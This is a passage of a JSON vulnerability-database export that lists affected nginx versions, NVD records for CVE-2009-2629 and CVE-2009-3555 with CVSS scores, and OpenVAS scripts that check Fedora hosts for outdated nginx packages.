"cpe:2.3:a:nginx:nginx:0.8.12:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.16:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.1.20:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.5.20:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.11:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.47:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.5:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.1.43:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.48:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.6.19:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.48:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.26:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.5.31:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.1.31:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.8.7:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.8.10:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.28:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.1.17:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.25:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.37:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.45:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.6.1516:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.6.31:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.6.33:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.5.19:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.51:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.6.25:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.23:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.5.32:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.6.21:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.8.5:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.6.13:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.50:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.21:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.1.13:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.17:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.61:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.41:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.1.12:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.8.6:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.6.7:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.5.15:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.1.15:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.12:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.38:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.4.11:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.6.8:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.33:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.1.29:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.6.20:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.6.35:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.59:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.1.27:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.5.12:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.5.10:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.39:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.1.36:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.6.34:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.1.45:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.43:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.10:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.58:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.34:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.43:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.6.10:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.60:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.6.36:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.19:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.59:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.52:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.58:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.45:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.36:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.5.34:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.4.10:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.36:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.1.28:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.49:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.5.35:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.8.9:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.1.30:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.44:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.6.6:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.5.27:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.34:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.6.9:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.4.13:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.1.14:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.5.26:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.1.22:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.46:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.32:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.42:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.1.42:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.13:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.1.38:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.4.8:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.6.22:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.57:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.8.4:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.35:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.5.11:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.9:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.15:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.8:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.5.13:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.5.37:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.5.16:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.22:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.5.36:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.5.28:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.50:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.53:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.29:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.1.23:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.61:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.55:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.5.29:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.1.21:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.1.32:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.17:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.53:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.51:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.22:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.6.30:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.6.14:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.47:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.12:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.55:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.4.12:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.46:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.6.18:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.30:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.3:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.33:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.54:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.5.21:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.5.22:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.1.41:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.6.24:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.7:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.24:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.15:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.1.34:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.42:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.6.11:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.8.11:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.41:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.1.35:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.6.17:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.60:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.24:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.32:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.37:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.26:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.54:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.19:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.1.10:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.1.33:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.1.16:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.25:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.5.30:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.14:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.18:*:*:*:*:*:*:*"]}, {"lastseen": "2021-04-21T20:47:52", "description": "Buffer underflow in src/http/ngx_http_parse.c in nginx 0.1.0 through 0.5.37, 0.6.x before 0.6.39, 0.7.x before 0.7.62, and 0.8.x before 0.8.15 allows remote attackers to execute arbitrary code via crafted HTTP requests.", "edition": 8, "cvss3": {}, "published": "2009-09-15T22:30:00", "title": "CVE-2009-2629", "type": "cve", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-2629"], "modified": "2020-11-16T19:32:00", "cpe": ["cpe:/o:fedoraproject:fedora:10", "cpe:/o:debian:debian_linux:6.0", "cpe:/o:debian:debian_linux:4.0", "cpe:/o:debian:debian_linux:5.0", "cpe:/o:fedoraproject:fedora:12", "cpe:/o:fedoraproject:fedora:11"], "id": "CVE-2009-2629", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2629", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:10:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:5.0:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:12:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:11:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:4.0:*:*:*:*:*:*:*"]}, {"lastseen": "2021-04-21T20:47:53", "description": "The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as used in Microsoft Internet Information Services (IIS) 7.0, mod_ssl in the Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l, GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS) 3.12.4 and earlier, multiple Cisco products, and other products, does not properly associate renegotiation handshakes with an existing connection, which allows man-in-the-middle attackers to insert data into HTTPS sessions, and possibly other types of sessions protected by TLS or SSL, by sending an unauthenticated request that is processed retroactively by a server in a post-renegotiation context, related to a \"plaintext injection\" attack, aka the \"Project Mogul\" issue.", "edition": 11, "cvss3": {}, "published": "2009-11-09T17:30:00", "title": "CVE-2009-3555", "type": "cve", "cwe": ["CWE-310"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3555"], "modified": "2021-02-05T15:37:00", "cpe": ["cpe:/o:debian:debian_linux:6.0", "cpe:/a:openssl:openssl:1.0", "cpe:/o:debian:debian_linux:4.0", "cpe:/a:openssl:openssl:0.9.8k", "cpe:/o:debian:debian_linux:8.0", "cpe:/a:gnu:gnutls:2.8.5", "cpe:/o:canonical:ubuntu_linux:8.04", "cpe:/o:fedoraproject:fedora:13", "cpe:/o:debian:debian_linux:5.0", "cpe:/o:fedoraproject:fedora:14", "cpe:/o:canonical:ubuntu_linux:10.10", "cpe:/a:mozilla:nss:3.12.4", "cpe:/o:canonical:ubuntu_linux:9.10", "cpe:/o:fedoraproject:fedora:12", "cpe:/o:canonical:ubuntu_linux:10.04", "cpe:/a:apache:http_server:2.2.14", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:canonical:ubuntu_linux:8.10", "cpe:/o:canonical:ubuntu_linux:9.04", "cpe:/o:fedoraproject:fedora:11"], "id": "CVE-2009-3555", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3555", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.14:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.8.5:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:8.04:*:*:*:lts:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:9.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:10.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:10.04:*:*:*:lts:*:*:*", "cpe:2.3:o:debian:debian_linux:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.8k:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:9.04:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:12:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:nss:3.12.4:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:11:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:8.10:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:13:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0:*:openvms:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:4.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-07-25T10:56:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555", "CVE-2009-2629", "CVE-2009-3896"], "description": "The remote host is missing an update to nginx\nannounced via advisory FEDORA-2009-12775.", "modified": "2017-07-10T00:00:00", "published": "2009-12-10T00:00:00", "id": "OPENVAS:66450", "href": "http://plugins.openvas.org/nasl.php?oid=66450", "type": "openvas", "title": "Fedora Core 10 FEDORA-2009-12775 (nginx)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_12775.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-12775 (nginx)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"ChangeLog:\n\n* Fri Dec 4 2009 Jeremy Hinegardner - 0.7.64-1\n- update to 0.7.64\n* Thu Oct 29 2009 Jeremy Hinegardner - 0.7.63-1\n- update to 0.7.63\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update nginx' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-12775\";\ntag_summary = \"The remote host is missing an update to nginx\nannounced via advisory FEDORA-2009-12775.\";\n\n\n\nif(description)\n{\n script_id(66450);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-10 00:23:54 +0100 (Thu, 10 Dec 2009)\");\n script_cve_id(\"CVE-2009-2629\", \"CVE-2009-3555\", \"CVE-2009-3896\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Core 10 FEDORA-2009-12775 (nginx)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=539573\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"nginx\", rpm:\"nginx~0.7.64~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"nginx-debuginfo\", rpm:\"nginx-debuginfo~0.7.64~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:56:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555", "CVE-2009-2629", "CVE-2009-3896"], "description": "The remote host is missing an update to nginx\nannounced via advisory FEDORA-2009-12750.", "modified": "2017-07-10T00:00:00", "published": "2009-12-10T00:00:00", "id": "OPENVAS:66449", "href": "http://plugins.openvas.org/nasl.php?oid=66449", "type": "openvas", "title": "Fedora Core 12 FEDORA-2009-12750 (nginx)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_12750.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-12750 (nginx)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"ChangeLog:\n\n* Fri Dec 4 2009 Jeremy Hinegardner - 0.7.64-1\n- Update to new stable 0.7.64\n* Thu Oct 29 2009 Jeremy Hinegardner - 0.7.63-1\n- Update to new stable 0.7.63\n- reinstate zlib dependency\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update nginx' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-12750\";\ntag_summary = \"The remote host is missing an update to nginx\nannounced via advisory FEDORA-2009-12750.\";\n\n\n\nif(description)\n{\n script_id(66449);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-10 00:23:54 +0100 (Thu, 10 Dec 2009)\");\n script_cve_id(\"CVE-2009-3555\", \"CVE-2009-3896\", \"CVE-2009-2629\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Core 12 FEDORA-2009-12750 (nginx)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=539573\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"nginx\", rpm:\"nginx~0.7.64~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"nginx-debuginfo\", 